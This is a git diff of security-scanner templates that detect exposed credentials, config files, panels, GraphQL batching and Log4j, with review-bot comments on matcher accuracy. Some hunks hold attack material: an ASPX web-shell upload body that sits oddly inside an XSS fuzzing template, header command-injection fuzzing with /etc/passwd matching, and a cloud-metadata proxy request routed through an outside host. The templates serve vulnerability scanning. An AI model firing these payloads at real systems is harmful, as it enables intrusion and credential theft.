matchers-condition: and matchers: - - type: word words: - "UserName=" - "Password=" condition: and - - type: word words: - "text/plain" part: header - - type: status status: - 200 diff --git a/poc/exposed/lvmeng-uts-disclosure.yaml b/poc/exposed/lvmeng-uts-disclosure.yaml index 698c818a0b..a419728c3a 100644 --- a/poc/exposed/lvmeng-uts-disclosure.yaml 
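Review bot: Switching the matcher and the extractor in poc/exposed/iis-internal-ip-disclosure.yaml from `part: location` to `part: header` applies the dotted-quad regex `([0-9]{1,3}[\.]){3}[0-9]{1,3}` to every response header, so a four-part version string or an address in an unrelated header on any 302 is reported as an internal IP disclosure. Keeping `part: location` confines the check to the redirect target, which is the value this template is about. Removing `301` from the status list also misses servers that answer the HTTP/1.0 request with a permanent redirect; listing `- 301` and `- 302` covers both. The regex does not restrict the match to private address ranges, so findings still need a manual look.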
+++ b/poc/exposed/lvmeng-uts-disclosure.yaml @@ -1,15 +1,19 @@ id: lvmeng-uts-disclosure + info: - name: Lvmeng UTS Disclosure + name: Lvmeng - UTS Disclosure author: pikpikcu severity: high + description: Lvmeng UTS was discovered. tags: config,exposure + requests: - method: GET path: - "{{BaseURL}}/webapi/v1/system/accountmanage/account" headers: Content-Type: application/json + matchers-condition: and matchers: - type: status @@ -27,3 +31,5 @@ requests: - "MANAGER_IP" condition: and part: body + +# Enhanced by mp on 2022/07/15 diff --git a/poc/exposed/monitorix-exposure.yaml b/poc/exposed/monitorix-exposure.yaml index 8c0b91fe08..4c32dc5743 100644 --- a/poc/exposed/monitorix-exposure.yaml +++ b/poc/exposed/monitorix-exposure.yaml @@ -5,7 +5,7 @@ info: description: Monitorix is a free, open source, lightweight system monitoring tool designed to monitor as many services and system resources as possible. reference: https://www.monitorix.org/ severity: low - tags: monitorix,exposure,logs,panel + tags: monitorix,exposure,logs requests: - method: GET diff --git a/poc/exposed/prometheus-exposed-panel-9684.yaml b/poc/exposed/prometheus-exposed-panel-9684.yaml index 371360dff8..a3d9d7d5d1 100644 --- a/poc/exposed/prometheus-exposed-panel-9684.yaml +++ b/poc/exposed/prometheus-exposed-panel-9684.yaml @@ -3,14 +3,12 @@ info: name: Prometheus.io exposed panel author: organiccrap severity: low - # usually runs on port http/9090 + tags: panel,prometheus requests: - method: GET path: - '{{BaseURL}}/graph' - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 matchers: - type: word words: - - Prometheus Time Series Collection and Processing Server + - 'Prometheus Time Series Collection and Processing Server' diff --git a/poc/exposed/putty-private-key-disclosure-9730.yaml b/poc/exposed/putty-private-key-disclosure-9730.yaml index bd198242b3..bdb1c932e8 100644 --- a/poc/exposed/putty-private-key-disclosure-9730.yaml 
+++ b/poc/exposed/putty-private-key-disclosure-9730.yaml @@ -1,42 +1,22 @@ id: putty-private-key-disclosure - info: name: Putty Private Key Disclosure - author: DhiyaneshDk,geeknik + author: dhiyaneshDk severity: medium - description: Putty internal user key file is exposed. - reference: - - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/putty-private-key-disclosure.json - metadata: - verified: true - max-request: 8 - github-query: filename:putty.ppk + reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/putty-private-key-disclosure.json tags: exposure,files - -http: +requests: - method: GET path: - "{{BaseURL}}/my.ppk" - - "{{BaseURL}}/putty.ppk" - - "{{BaseURL}}/{{Hostname}}.ppk" - - "{{BaseURL}}/.ssh/putty.ppk" - - "{{BaseURL}}/.ssh/{{Hostname}}.ppk" - - "{{BaseURL}}/.putty/my.ppk" - - "{{BaseURL}}/.putty/putty.ppk" - - "{{BaseURL}}/.putty/{{Hostname}}.ppk" - - stop-at-first-match: true - matchers-condition: and matchers: - type: word - part: body words: - "PuTTY-User-Key-File" - "Encryption:" + part: body condition: and - - type: status status: - 200 -# digest: 4a0a004730450221009743a619b8ae5bbb216de2254c978a6aff3bceeb7cc54124697d3e8b2d7b5150022068d3fcc4ef1b0bcfb6c280cd87534daf8cce9751a796c0a344d8751af50b19a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/exposed/qihang-media-disclosure.yaml b/poc/exposed/qihang-media-disclosure.yaml index 1cdbe2c7a0..dcd65699ea 100644 --- a/poc/exposed/qihang-media-disclosure.yaml +++ b/poc/exposed/qihang-media-disclosure.yaml 
@@ -4,7 +4,8 @@ info: author: gy741 severity: critical description: The application suffers from clear-text credentials disclosure vulnerability that allows an unauthenticated attacker to issue a request to an unprotected directory that hosts an XML file /xml/User/User.xml and obtain administrative login information that allows for a successful authentication bypass attack. - reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5579.php + reference: + - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5579.php tags: qihang,exposure requests: - method: GET diff --git a/poc/exposed/ruijie-information-disclosure-9932.yaml b/poc/exposed/ruijie-information-disclosure-9932.yaml index e7824e2a0b..a8d752d733 100644 --- a/poc/exposed/ruijie-information-disclosure-9932.yaml +++ b/poc/exposed/ruijie-information-disclosure-9932.yaml @@ -1,21 +1,37 @@ id: ruijie-information-disclosure + info: - name: Ruijie Information Disclosure + name: Ruijie Login Panel - Detect author: pikpikcu severity: high - reference: https://www.cnblogs.com/cHr1s/p/14499858.html + description: Ruijie login panel was detected and leaks authentication credentials. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cwe-id: CWE-200 + reference: + - https://www.ruijienetworks.com/ + - https://www.cnblogs.com/cHr1s/p/14499858.html tags: ruijie,config,exposure -requests: + metadata: + max-request: 1 + +http: - method: GET path: - '{{BaseURL}}/login.php' + matchers-condition: and matchers: + - type: regex regex: - '"role":"super_admin","name":"(.*)","password":"(.*)"' part: body condition: and + - type: status status: - 200 + +# Enhanced by cs on 2023/03/02 diff --git a/poc/exposed/ruijie-information-disclosure.yaml b/poc/exposed/ruijie-information-disclosure.yaml index e7824e2a0b..8776f3ffb8 100644 --- a/poc/exposed/ruijie-information-disclosure.yaml +++ b/poc/exposed/ruijie-information-disclosure.yaml 
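Review bot: The new name `Ruijie Login Panel - Detect` in poc/exposed/ruijie-information-disclosure-9932.yaml does not describe what the matcher finds: the regex only fires when `/login.php` returns a `super_admin` name and password, and the `severity: high` and `cwe-id: CWE-200` values are for that leak. The earlier wording, `name: Ruijie Information Disclosure`, keeps triage lists accurate. `condition: and` on a matcher with a single regex has no effect and can be removed, and the two `(.*)` groups are greedy across the line; `([^"]*)` would hold each group to one field.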
@@ -1,21 +1,26 @@ id: ruijie-information-disclosure + info: name: Ruijie Information Disclosure author: pikpikcu severity: high reference: https://www.cnblogs.com/cHr1s/p/14499858.html tags: ruijie,config,exposure + requests: - method: GET path: - '{{BaseURL}}/login.php' + matchers-condition: and matchers: + - type: regex regex: - '"role":"super_admin","name":"(.*)","password":"(.*)"' part: body condition: and + - type: status status: - 200 diff --git a/poc/exposed/sensitive-storage-exposure.yaml b/poc/exposed/sensitive-storage-exposure.yaml index 99e0b57b40..0b841cf60b 100644 --- a/poc/exposed/sensitive-storage-exposure.yaml +++ b/poc/exposed/sensitive-storage-exposure.yaml @@ -4,8 +4,7 @@ info: author: pussycat0x severity: medium description: Searches for sensitive keys file,logs,debugbar,app. - reference: - - https://www.exploit-db.com/ghdb/6304 + reference: https://www.exploit-db.com/ghdb/6304 tags: expose,listing,config,logs,storage requests: - method: GET diff --git a/poc/exposed/thumbs-db-disclosure-10763.yaml b/poc/exposed/thumbs-db-disclosure-10763.yaml index b5ee7b65d9..728de9d555 100644 --- a/poc/exposed/thumbs-db-disclosure-10763.yaml +++ b/poc/exposed/thumbs-db-disclosure-10763.yaml @@ -1,12 +1,11 @@ id: thumbs-db-disclosure - info: name: Thumbs DB Disclosure author: dhiyaneshDk severity: info - reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/thumbs-db-disclosure.json + reference: + - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/thumbs-db-disclosure.json tags: exposure,files - requests: - method: GET path: @@ -17,7 +16,6 @@ requests: binary: - 'D0CF11E0A1B11AE1' part: body - - type: status status: - 200 diff --git a/poc/exposed/tugboat-config-exposure-10842.yaml b/poc/exposed/tugboat-config-exposure-10842.yaml index 50793f616a..cd0e1af78a 100644 --- a/poc/exposed/tugboat-config-exposure-10842.yaml +++ b/poc/exposed/tugboat-config-exposure-10842.yaml 
@@ -1,5 +1,4 @@ id: tugboat-config-exposure - info: name: Tugboat configuration file exposure description: Tugboat is a command line tool for interacting with your DigitalOcean droplets. @@ -7,25 +6,21 @@ info: author: geeknik severity: critical tags: tugboat,config,exposure - requests: - method: GET path: - "{{BaseURL}}/.tugboat" - matchers-condition: and matchers: - type: status status: - 200 - - type: word words: - "authentication" - "access_token" - "ssh_user" condition: and - extractors: - type: regex part: body diff --git a/poc/exposed/wp-mailchimp-log-exposure-11492.yaml b/poc/exposed/wp-mailchimp-log-exposure-11492.yaml index 1869a7386f..42ab9af2c0 100644 --- a/poc/exposed/wp-mailchimp-log-exposure-11492.yaml +++ b/poc/exposed/wp-mailchimp-log-exposure-11492.yaml @@ -1,28 +1,23 @@ id: wp-mailchimp-log-exposure - info: name: WordPress Mailchimp 4 Debug Log Exposure author: aashiq severity: medium description: Searches for Mailchimp log exposure by attempting to query the debug log endpoint on wp-content - tags: logs,wordpress,exposure - + tags: logs,wordpress,exposure,mailchimp requests: - method: GET path: - "{{BaseURL}}/wp-content/uploads/mc4wp-debug.log" - matchers-condition: and matchers: - type: status status: - 200 - - type: word words: - "WARNING: Form" - - type: word words: - 'text/plain' - part: header \ No newline at end of file + part: header diff --git a/poc/ftp/ftp-credentials-exposure.yaml b/poc/ftp/ftp-credentials-exposure.yaml index a0650c5bb3..2144e34389 100644 --- a/poc/ftp/ftp-credentials-exposure.yaml +++ b/poc/ftp/ftp-credentials-exposure.yaml @@ -1,13 +1,16 @@ id: ftp-credentials-exposure + info: name: FTP credentials exposure author: pikpikcu severity: medium tags: config,ftp,exposure + requests: - method: GET path: - "{{BaseURL}}/ftpsync.settings" + matchers-condition: and matchers: - type: word 
@@ -17,6 +20,7 @@ requests: - default_folder_permissions part: body condition: and + - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/poc/ftp/ftpconfig-7566.yaml b/poc/ftp/ftpconfig-7566.yaml index eb5cce7910..b3a3fde0bf 100644 --- a/poc/ftp/ftpconfig-7566.yaml +++ b/poc/ftp/ftpconfig-7566.yaml @@ -1,32 +1,27 @@ id: ftpconfig - info: - name: Atom remote-ssh ftpconfig Exposure - author: geeknik,DhiyaneshDK - severity: high + name: Atom remote-ssh ftpconfig + author: geeknik description: Created by remote-ssh for Atom, contains SFTP/SSH server details and credentials - metadata: - verified: true - max-request: 1 - shodan-query: html:ftpconfig - tags: atom,ftp,config,exposure,files - -http: + severity: high + tags: atom,ftp,config +requests: - method: GET path: - "{{BaseURL}}/.ftpconfig" - matchers-condition: and matchers: - type: word + part: header words: - - '"protocol":' - - '"host":' - - '"user":' - - '"passphrase":' - condition: and - + - "text/plain" - type: status status: - 200 -# digest: 4a0a0047304502203e964492aa5ae873f03597ac2a5b426d215393200bd9a91a40eb7140836f033d022100d12b8356b48603f84427b50a84d0078581d289d3d7e9f95cf8310044a880bc29:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - type: word + words: + - "protocol" + - "host" + - "port" + - "user" + condition: and diff --git a/poc/ftp/ftpconfig.yaml b/poc/ftp/ftpconfig.yaml index b3a3fde0bf..4be596f119 100644 --- a/poc/ftp/ftpconfig.yaml +++ b/poc/ftp/ftpconfig.yaml @@ -1,14 +1,17 @@ id: ftpconfig + info: name: Atom remote-ssh ftpconfig author: geeknik description: Created by remote-ssh for Atom, contains SFTP/SSH server details and credentials severity: high tags: atom,ftp,config + requests: - method: GET path: - "{{BaseURL}}/.ftpconfig" + matchers-condition: and matchers: - type: word diff --git a/poc/ftp/vsftpd-detection.yaml b/poc/ftp/vsftpd-detection.yaml index f4ecde4fab..934be20cb9 100644 --- a/poc/ftp/vsftpd-detection.yaml 
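Review bot: In poc/ftp/ftpconfig-7566.yaml the body matcher now looks for the bare words `protocol`, `host`, `port` and `user`, which any plain-text page mentioning those terms satisfies, so a `severity: high` finding can fire on unrelated files. The removed side matched the JSON keys themselves; keeping that form, e.g. `- '"protocol":'` and `- '"passphrase":'`, ties the match to the file's structure. The new `text/plain` header matcher also assumes the server labels the file that way, which is not guaranteed. The same hunk drops the `# digest:` signature line and reverts `http:` to the older `requests:` key, as does poc/git/wordpress-git-config-11278.yaml; if signed templates are expected downstream, that should be an explicit decision rather than a side effect of the sync.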
+++ b/poc/ftp/vsftpd-detection.yaml @@ -1,10 +1,18 @@ id: vsftpd-detection info: - name: VSFTPD v2.3.4 Backdoor Command Execution + name: VSFTPD 2.3.4 - Backdoor Command Execution author: pussycat0x severity: critical - tags: network,vsftpd,ftp - reference: https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor/ + description: VSFTPD 2.3.4 contains a backdoor command execution vulnerability. + reference: + - https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cve-id: + cwe-id: CWE-78 + remediation: This backdoor was removed on July 3rd, 2011. + tags: network,vsftpd,ftp,backdoor network: - inputs: - data: "USER anonymous\r\nPASS pussycat0x\r\n" @@ -15,3 +23,5 @@ network: - type: word words: - "vsFTPd 2.3.4" + +# Enhanced by mp on 2022/05/23 diff --git a/poc/fuzz/xss-fuzz-11701.yaml b/poc/fuzz/xss-fuzz-11701.yaml index 3bed54cfe7..d4410a5f77 100644 --- a/poc/fuzz/xss-fuzz-11701.yaml +++ b/poc/fuzz/xss-fuzz-11701.yaml @@ -1,6 +1,5 @@ # id contains the unique identifier for the template. id: esetal-xss-fuzz - info: # Name is the name of the template name: Top 15 XSS Check @@ -10,7 +9,6 @@ info: # Description optionally describes the template. description: Searches for reflected XSS in the server response via GET-requests (but 9x slower xd). tags: xss - requests: - method: GET path: 
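Review bot: The `classification` block added in poc/ftp/vsftpd-detection.yaml leaves `cve-id:` with no value, which YAML loads as null; either fill in the assigned identifier or drop the key (poc/ibm/ibm-mqseries-default-login-8107.yaml adds the same empty key). The name, `cvss-score: 10.0` and `severity: critical` describe command execution, while the only matcher visible in the second hunk is the banner string `vsFTPd 2.3.4`. A banner match establishes the reported version, not that the backdoored build is present, so the description should say this is version detection, or the severity should be lowered to match what is actually verified.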
@@ -30,12 +28,10 @@ requests: words: - "<%@Import Namespace="System.Reflection"%><%Session.Add("k","e45e329feb5d925b"); Encoding.Default.GetBytes(Session[0] + ""),c = Request.BinaryRead(Request.ContentLength);Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance("U").Equals(this);%> ------WebKitFormBoundaryhbcZX7o0Hw19h3kr Content-Disposition: form-data; name="action" - + upload ------WebKitFormBoundaryhbcZX7o0Hw19h3kr Content-Disposition: form-data; name="responderId" - + ResourceNewResponder ------WebKitFormBoundaryhbcZX7o0Hw19h3kr Content-Disposition: form-data; name="remotePath" - + /opt/resources ------WebKitFormBoundaryhbcZX7o0Hw19h3kr-- - matchers-condition: and matchers: - type: status @@ -43,4 +40,4 @@ requests: - "cmd.aspx" - "true" part: body - condition: and \ No newline at end of file + condition: and diff --git a/poc/git/git-config-7636.yaml b/poc/git/git-config-7636.yaml index 9f030f2ce7..e1f9a3e2d4 100644 --- a/poc/git/git-config-7636.yaml +++ b/poc/git/git-config-7636.yaml 
@@ -1,36 +1,14 @@ id: git-config - info: name: Git Config Disclosure - author: pdteam,pikpikcu,Mah3Sec_ + author: Ice3man severity: medium - description: Searches for the pattern /.git/config and log file on passed URLs. - tags: config,git,exposure - + description: Searches for the pattern /.git/config on passed URLs. requests: - - raw: - - | - GET /.git/config HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Content-Type: application/x-www-form-urlencoded - Content-Length: 1 - Connection: close - - matchers-condition: and + - method: GET + path: + - "{{BaseURL}}/.git/config" matchers: - type: word words: - "[core]" - - - type: dsl - dsl: - - "!contains(tolower(body), '' \ No newline at end of file + - '' + negative: true \ No newline at end of file diff --git a/poc/git/wordpress-git-config-11278.yaml b/poc/git/wordpress-git-config-11278.yaml index 2e71493a93..623ab5f4aa 100644 --- a/poc/git/wordpress-git-config-11278.yaml +++ b/poc/git/wordpress-git-config-11278.yaml @@ -5,13 +5,10 @@ info: author: nerrorsec severity: info description: Searches for the pattern /.git/config inside themes and plugins folder. - reference: - - https://hackerone.com/reports/248693 - metadata: - max-request: 2 - tags: hackerone,config,git,exposure,wordpress,wp-plugin,wp-theme + reference: https://hackerone.com/reports/248693 + tags: config,git,exposure,wordpress,wp-plugin,wp-theme -http: +requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/.git/config" @@ -32,5 +29,3 @@ http: - type: status status: - 200 - -# digest: 490a0046304402200c85e6bde7f8fd5a418f6ae475ea3e43619b2c9bbdaa025a2ff0a3467f271cc802204e6427102c1fe622a829ec9df5831e46740d60b9bf8eec9d72ecd086068a28de:922c64590222798bb761d5b6d8e72950 
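Review bot: Dropping `matchers-condition: and` in poc/git/git-config-7636.yaml leaves the matchers combined with the default `or`, so a matcher carrying the added `negative: true` is enough on its own to report a finding on any response that lacks its word. Indentation and part of the quoted word are lost on this page, so the exact nesting cannot be confirmed; if `negative: true` instead sits on the same matcher as `"[core]"`, it inverts that check as well. Restoring `matchers-condition: and` and adding a `status` matcher for `200` would keep the result tied to an actual config file. The `tags:` line is also removed, which takes the template out of tag-filtered runs.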
diff --git a/poc/google/Google-api.yaml b/poc/google/Google-api.yaml index b5b0737aa7..1242ce0367 100644 --- a/poc/google/Google-api.yaml +++ b/poc/google/Google-api.yaml @@ -1,12 +1,15 @@ id: google-api-key-file + info: name: Google API key author: gaurang severity: info tags: token,file,google + file: - extensions: - all + extractors: - type: regex regex: diff --git a/poc/google/google-api-key.yaml b/poc/google/google-api-key.yaml index 1798c569c3..d8a2a240cd 100644 --- a/poc/google/google-api-key.yaml +++ b/poc/google/google-api-key.yaml @@ -1,19 +1,24 @@ -id: google-api-key - -info: - name: Google API Key - author: Swissky - severity: info - tags: exposure,token,google - -requests: - - method: GET - path: - - "{{BaseURL}}" - - "{{BaseURL}}/hopfully404" - - extractors: - - type: regex - part: body - regex: - - "AIza[0-9A-Za-z\\-_]{35}" +id: google-api-key + +info: + name: Google API Key + author: Swissky + severity: medium + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "AIza[0-9A-Za-z\\-_]{35}" + + extractors: + - type: regex + part: body + regex: + - "AIza[0-9A-Za-z\\-_]{35}" diff --git a/poc/google/google-earth-dlogin-7780.yaml b/poc/google/google-earth-dlogin-7780.yaml index 6a574174aa..ae7bc0bc25 100644 --- a/poc/google/google-earth-dlogin-7780.yaml +++ b/poc/google/google-earth-dlogin-7780.yaml @@ -1,4 +1,5 @@ id: google-earth-dlogin + info: name: Google Earth Enterprise Default Login author: orpheus,johnjhacking @@ -20,23 +21,28 @@ info: metadata: shodan-query: title:"GEE Server" tags: default-login,google-earth + requests: - raw: - | GET /admin/ HTTP/1.1 Host: {{Hostname}} Authorization: Basic {{base64(username + ':' + password)}} + attack: pitchfork payloads: username: - geapacheuser + password: - geeadmin + matchers-condition: and matchers: - type: status status: - 200 + - type: word condition: and words: 
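Review bot: poc/google/google-api-key.yaml raises `severity` from `info` to `medium` although the only evidence is the regex `AIza[0-9A-Za-z\\-_]{35}` appearing in the response body, and browser-facing Google keys are commonly embedded in pages by design. Keeping `severity: info` leaves the rating to whoever checks the key's restrictions. The `tags:` line is dropped on the new side, so tag-based selection no longer picks this template up; `tags: exposure,token,google` should stay. The added matcher repeats the extractor's regex, and `matchers-condition: and` has no effect with a single matcher.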
diff --git a/poc/google/metadata-google-8820.yaml b/poc/google/metadata-google-8820.yaml index 0e4bb0d91a..c930b428c4 100644 --- a/poc/google/metadata-google-8820.yaml +++ b/poc/google/metadata-google-8820.yaml @@ -1,8 +1,8 @@ id: metadata-service-gcp # This attack abuses a misconfigured proxy that allows access to the metadata # IP or a name which resolves to the IP. A standard proxy request is made to -# the proxy using the full metadata URL, which the proxy will fulfull to its -# own metadata sevice. +# the proxy using the full metadata URL, which the proxy will fulfill to its +# own metadata service. # # The proxy may also be vulnerable to host/port enumeration on localhost or # inside the private network. @@ -11,7 +11,7 @@ info: author: sullo severity: critical description: The Google cloud (GCP) host is configured as a proxy which allows access to the instance metadata service. This could allow significant access to the host/infrastructure. - remediation: Disable the proxy or restrict configuraiton to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. + remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. reference: - https://cloud.google.com/compute/docs/metadata/default-metadata-values - https://blog.projectdiscovery.io/abusing-reverse-proxies-metadata/ @@ -23,11 +23,10 @@ info: cwe-id: CWE-441 requests: - raw: - - |+ + - | GET http://{{hostval}}/computeMetadata/v1/project/ HTTP/1.1 Host: {{hostval}} Metadata-Flavor: Google - payloads: hostval: - aws.interact.sh @@ -38,3 +37,4 @@ requests: part: body words: - "attributes/" +# Enhanced by cs on 2022/02/14 diff --git a/poc/graphql/graphql-array-batching-7827.yaml b/poc/graphql/graphql-array-batching-7827.yaml index 0297004ea8..d8731f71da 100644 --- a/poc/graphql/graphql-array-batching-7827.yaml +++ b/poc/graphql/graphql-array-batching-7827.yaml 
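Review bot: The `remediation` line edited in the second hunk of poc/google/metadata-google-8820.yaml still ends with `Upgrade to IMDSv2 if possible`, which is an AWS EC2 feature and does not apply to the GCP metadata service this template describes. Wording such as `remediation: Disable the proxy or restrict its configuration to approved hosts/ports, and deny proxied requests to the metadata address.` would match the finding. The typo fixes in the same hunk are fine as they stand.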
@@ -1,19 +1,23 @@ id: graphql-array-batching + info: name: GraphQL Array-based Batching author: Dolev Farhi - severity: low + severity: info description: | Some GraphQL engines support batching of multiple queries into a single request. This allows users to request multiple objects or multiple instances of objects efficiently. However, an attacker can leverage this feature to evade many security measures, including Rate Limit. + remediation: | + Deactivate or limit Batching in your GraphQL engine. reference: - https://stackoverflow.com/questions/62421352/graphql-difference-between-using-alias-versus-multiple-query-objects-when-doin - https://github.com/dolevf/Damn-Vulnerable-GraphQL-Application - https://graphql.security/ - remediation: | - Deactivate or limit Batching in your GraphQL engine. - tags: graphql -requests: + metadata: + max-request: 2 + tags: graphql,misconfig + +http: - raw: - | POST /graphql HTTP/1.1 @@ -21,6 +25,15 @@ requests: Content-Type: application/json [{"query":"query {\n __typename \n }"}, {"query":"mutation { \n __typename \n }"}] + - | + POST /api/graphql HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + [{"query":"query {\n __typename \n }"}, {"query":"mutation { \n __typename \n }"}] + + stop-at-first-match: true + matchers-condition: and matchers: - type: word @@ -30,7 +43,10 @@ requests: - ':"Mutations"' case-insensitive: true condition: and + - type: word part: header words: - "application/json" + +# digest: 4b0a004830460221009352f5fb69d50c384b0609e39864120c5da438c4d4b50e5f7ff9e78e6a17fdbc02210093902ef377f0eca11245c1fd3095f3b29f51a9417d1a48f3a7e1df0ecb0d0185:922c64590222798bb761d5b6d8e72950 diff --git a/poc/graphql/graphql-detect.yaml b/poc/graphql/graphql-detect.yaml index 1794593fe9..399e476c60 100644 --- a/poc/graphql/graphql-detect.yaml +++ b/poc/graphql/graphql-detect.yaml 
@@ -2,7 +2,7 @@ id: graphql-detect info: name: GraphQL API Detection - author: NkxxkN & ELSFA7110 + author: NkxxkN,ELSFA7110 severity: info requests: @@ -30,8 +30,6 @@ requests: - "{{BaseURL}}/graphql-devtools" - "{{BaseURL}}/graphql/v1" - "{{BaseURL}}/v1/graphql" - - "{{BaseURL}}/lol/graphql" - - "{{BaseURL}}/lol/graphql/v1" - "{{BaseURL}}/api/graphql/v1" - "{{BaseURL}}/portal-graphql" - "{{BaseURL}}/graphql-playground" diff --git a/poc/header/header-command-injection-7917.yaml b/poc/header/header-command-injection-7917.yaml index e9b07459aa..9cb3402bac 100644 --- a/poc/header/header-command-injection-7917.yaml +++ b/poc/header/header-command-injection-7917.yaml @@ -6,18 +6,17 @@ info: description: Fuzzing headers for command injection tags: fuzz,rce requests: - - payloads: - header: helpers/payloads/request-headers.txt - payload: helpers/payloads/command-injection.txt - raw: + - raw: - | - GET /?§header§ HTTP/1.1 + GET /?{{header}} HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 - §header§: §payload§ - Connection: close + {{header}}: {{payload}} + payloads: + header: helpers/payloads/request-headers.txt + payload: helpers/payloads/command-injection.txt attack: clusterbomb redirects: true + stop-at-first-match: true matchers-condition: or matchers: - type: word @@ -28,4 +27,4 @@ requests: condition: and - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" diff --git a/poc/header/log4j-header.yaml b/poc/header/log4j-header.yaml index 7e1270f434..1d617fc7fd 100644 --- a/poc/header/log4j-header.yaml +++ b/poc/header/log4j-header.yaml 
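Review bot: The passwd matcher in poc/header/header-command-injection-7917.yaml is loosened from `root:[x*]:0:0:` to `root:.*:0:0:`, and the greedy `.*` accepts any text between `root:` and a later `:0:0:` on the same line. `root:[^:]*:0:0:` still covers a populated password field while keeping the match to a single passwd field, which cuts false positives. The matcher list starts outside this hunk, so the other conditions under `matchers-condition: or` are not fully visible here.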
@@ -1,23 +1,90 @@ id: log4j-fuzz-head-poc info: - name: log4j-rce漏洞 - author: xxx + name: "Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints" + description: | + Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features + used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other + JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary + code loaded from LDAP servers when message lookup substitution is enabled. + From log4j 2.15.0, this behavior has been disabled by default. + From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. + Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, + or other Apache Logging Services projects. + author: xxx,topscoder severity: critical - tags: apache,rce + reference: + - https://logging.apache.org/log4j/2.x/security.html + - http://www.openwall.com/lists/oss-security/2021/12/10/1 + - http://www.openwall.com/lists/oss-security/2021/12/10/2 + - http://packetstormsecurity.com/files/165225/Apache-Log4j2-2.14.1-Remote-Code-Execution.html + - https://security.netapp.com/advisory/ntap-20211210-0007/ + - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd + - http://www.openwall.com/lists/oss-security/2021/12/10/3 + - https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032 + - https://www.oracle.com/security-alerts/alert-cve-2021-44228.html + - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU57UJDCFIASIO35GC55JMKSRXJMCDFM/ + - http://www.openwall.com/lists/oss-security/2021/12/13/1 + - http://www.openwall.com/lists/oss-security/2021/12/13/2 + - https://twitter.com/kurtseifried/status/1469345530182455296 + - 
https://lists.debian.org/debian-lts-announce/2021/12/msg00007.html + - https://www.debian.org/security/2021/dsa-5020 + - https://cert-portal.siemens.com/productcert/pdf/ssa-661247.pdf + - http://packetstormsecurity.com/files/165270/Apache-Log4j2-2.14.1-Remote-Code-Execution.html + - http://packetstormsecurity.com/files/165260/VMware-Security-Advisory-2021-0028.html + - http://packetstormsecurity.com/files/165261/Apache-Log4j2-2.14.1-Information-Disclosure.html + - http://www.openwall.com/lists/oss-security/2021/12/14/4 + - https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00646.html + - https://www.kb.cert.org/vuls/id/930724 + - http://packetstormsecurity.com/files/165282/Log4j-Payload-Generator.html + - http://packetstormsecurity.com/files/165281/Log4j2-Log4Shell-Regexes.html + - http://packetstormsecurity.com/files/165306/L4sh-Log4j-Remote-Code-Execution.html + - http://packetstormsecurity.com/files/165307/Log4j-Remote-Code-Execution-Word-Bypassing.html + - http://packetstormsecurity.com/files/165311/log4j-scan-Extensive-Scanner.html + - http://www.openwall.com/lists/oss-security/2021/12/15/3 + - https://cert-portal.siemens.com/productcert/pdf/ssa-714170.pdf + - https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/ + - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd + - https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf + - http://packetstormsecurity.com/files/165371/VMware-Security-Advisory-2021-0028.4.html + - https://cert-portal.siemens.com/productcert/pdf/ssa-397453.pdf + - http://packetstormsecurity.com/files/165532/Log4Shell-HTTP-Header-Injection.html + - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M5CSVUNV4HWZZXGOKNSK6L7RPM7BOKIB/ + - https://github.com/cisagov/log4j-affected-db/blob/develop/SOFTWARE-LIST.md + - 
